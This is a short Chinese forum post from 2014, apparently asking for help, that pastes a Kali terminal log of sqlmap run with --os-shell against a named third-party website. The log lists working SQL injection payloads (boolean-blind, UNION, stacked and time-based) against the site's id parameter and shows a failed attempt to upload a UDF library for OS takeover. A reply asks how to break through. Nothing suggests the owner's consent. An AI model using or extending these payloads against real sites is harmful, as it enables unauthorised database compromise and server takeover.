不是root拿J8
root@kali:~# sqlmap -u http://ls.gamefy.cn/detail.php?id=13 --os-shell
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:40:57
[12:40:58] [INFO] resuming back-end DBMS 'mysql'
[12:40:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13 AND 4788=4788
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: id=-4963 UNION ALL SELECT 48,48,48,48,48,48,48,48,48,CONCAT(0x7162676f71,0x414144674654756a6c51,0x71666c6c71),48,48,48,48,48,48,48,48,48#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: id=13; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=13 AND SLEEP(5)
---
[12:40:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[12:40:58] [INFO] fingerprinting the back-end DBMS operating system
[12:40:58] [INFO] the back-end DBMS operating system is Linux
[12:40:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[12:41:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[12:41:04] [INFO] testing if current user is DBA
[12:41:04] [INFO] fetching current user
[12:41:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:41:04] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:41:07] [INFO] checking if UDF 'sys_eval' already exist
[12:41:08] [INFO] checking if UDF 'sys_exec' already exist
[12:41:08] [INFO] detecting back-end DBMS version from its banner
[12:41:08] [INFO] retrieving MySQL base directory absolute path
[12:41:14] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[12:41:14] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N]
|
[复制链接]
发表于 2014-11-15 11:42:57
发表于 2014-11-15 12:19:30
看看怎么突破的